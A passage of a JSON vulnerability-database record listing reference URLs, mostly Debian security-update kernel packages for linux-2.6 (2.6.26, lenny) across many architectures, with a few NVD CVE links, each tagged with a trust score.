        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-i386_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-xen-686_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.26-2-xen-686_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-686-bigmem_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-mckinley_2.6.26-21lenny3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-s390x_2.6.26-21lenny2_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny1_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-486_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sparc64_2.6.26-21lenny1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-486_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-amd64_2.6.26-21lenny3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-amd64_2.6.26-21lenny2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-4027"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-r4k-ip22_2.6.26-21lenny2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc_2.6.26-21lenny3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-footbridge_2.6.26-21lenny2_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-xen-686_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-s390-tape_2.6.26-21lenny1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-openvz-amd64_2.6.26-21lenny3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sparc64_2.6.26-21lenny3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-generic_2.6.26-21lenny3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-powerpc_2.6.26-21lenny3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-source-2.6.26_2.6.26-21lenny1_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-openvz_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-686-bigmem_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-5kc-malta_2.6.26-21lenny3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-openvz-amd64_2.6.26-21lenny2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-686-bigmem_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-orion5x_2.6.26-21lenny1_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-4kc-malta_2.6.26-21lenny3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-powerpc_2.6.26-21lenny3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-ixp4xx_2.6.26-21lenny1_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-i386_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3939"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc64_2.6.26-21lenny3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-s390_2.6.26-21lenny2_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny3_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-openvz_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-r5k-ip32_2.6.26-21lenny3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-armel_2.6.26-21lenny3_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-legacy_2.6.26-21lenny2_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc_2.6.26-21lenny3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-generic_2.6.26-21lenny1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-r5k-cobalt_2.6.26-21lenny2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-4kc-malta_2.6.26-21lenny3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-ixp4xx_2.6.26-21lenny3_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny2_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sb1a-bcm91480b_2.6.26-21lenny3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sparc64-smp_2.6.26-21lenny2_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc64-smp_2.6.26-21lenny3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-xen-686_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-legacy_2.6.26-21lenny1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-hppa_2.6.26-21lenny3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny2_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-ia64_2.6.26-21lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-iop32x_2.6.26-21lenny2_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-amd64_2.6.26-21lenny2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-ixp4xx_2.6.26-21lenny1_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-armel_2.6.26-21lenny1_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sb1a-bcm91480b_2.6.26-21lenny2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-openvz-amd64_2.6.26-21lenny2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny2_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-sparc64_2.6.26-21lenny2_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-ia64_2.6.26-21lenny3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-patch-debian-2.6.26_2.6.26-21lenny2_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-mckinley_2.6.26-21lenny3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-smp_2.6.26-21lenny2_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-orion5x_2.6.26-21lenny3_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-patch-debian-2.6.26_2.6.26-21lenny3_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-s390x_2.6.26-21lenny3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-iop32x_2.6.26-21lenny3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc-smp_2.6.26-21lenny3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-amd64_2.6.26-21lenny2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-5kc-malta_2.6.26-21lenny2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sb1-bcm91250a_2.6.26-21lenny3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-orion5x_2.6.26-21lenny3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sparc64_2.6.26-21lenny1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-amd64_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-xen_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-4kc-malta_2.6.26-21lenny2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sparc64-smp_2.6.26-21lenny3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-686-bigmem_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-4kc-malta_2.6.26-21lenny2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny2_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-4kc-malta_2.6.26-21lenny3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-footbridge_2.6.26-21lenny3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-ixp4xx_2.6.26-21lenny3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.26-21lenny2.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc_2.6.26-21lenny2_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-r4k-ip22_2.6.26-21lenny3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-s390x_2.6.26-21lenny1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-itanium_2.6.26-21lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.26.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-alpha_2.6.26-21lenny1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-686_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-r5k-cobalt_2.6.26-21lenny3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-openvz-686_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-footbridge_2.6.26-21lenny3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-4kc-malta_2.6.26-21lenny2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-sparc64_2.6.26-21lenny1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-itanium_2.6.26-21lenny3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-mipsel_2.6.26-21lenny2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-smp_2.6.26-21lenny1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-arm_2.6.26-21lenny3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-686-bigmem_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-xen_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-legacy_2.6.26-21lenny1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-sparc_2.6.26-21lenny1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-sparc64_2.6.26-21lenny3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-686_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc_2.6.26-21lenny2_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-generic_2.6.26-21lenny1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-486_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-s390_2.6.26-21lenny2_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-openvz_2.6.26-21lenny2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0306"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sb1a-bcm91480b_2.6.26-21lenny2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-tree-2.6.26_2.6.26-21lenny1_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny2_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-support-2.6.26-2_2.6.26-21lenny3_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-powerpc_2.6.26-21lenny3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-s390x_2.6.26-21lenny2_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny2_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-r5k-cobalt_2.6.26-21lenny3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-s390x_2.6.26-21lenny3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-686-bigmem_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sparc64_2.6.26-21lenny2_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-amd64_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-powerpc-smp_2.6.26-21lenny3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-generic_2.6.26-21lenny2_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.26-2-xen-686_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc-smp_2.6.26-21lenny2_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-xen_2.6.26-21lenny2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc64-smp_2.6.26-21lenny2_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-mckinley_2.6.26-21lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-itanium_2.6.26-21lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-powerpc_2.6.26-21lenny3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-orion5x_2.6.26-21lenny3_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-686-bigmem_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-486_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny2_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.26-2-xen-686_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-itanium_2.6.26-21lenny3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-iop32x_2.6.26-21lenny1_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-s390x_2.6.26-21lenny3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-amd64_2.6.26-21lenny2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.26-2-xen-amd64_2.6.26-21lenny3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-amd64_2.6.26-21lenny3_amd64.deb"
      },
      {
        "trust": 0.1,
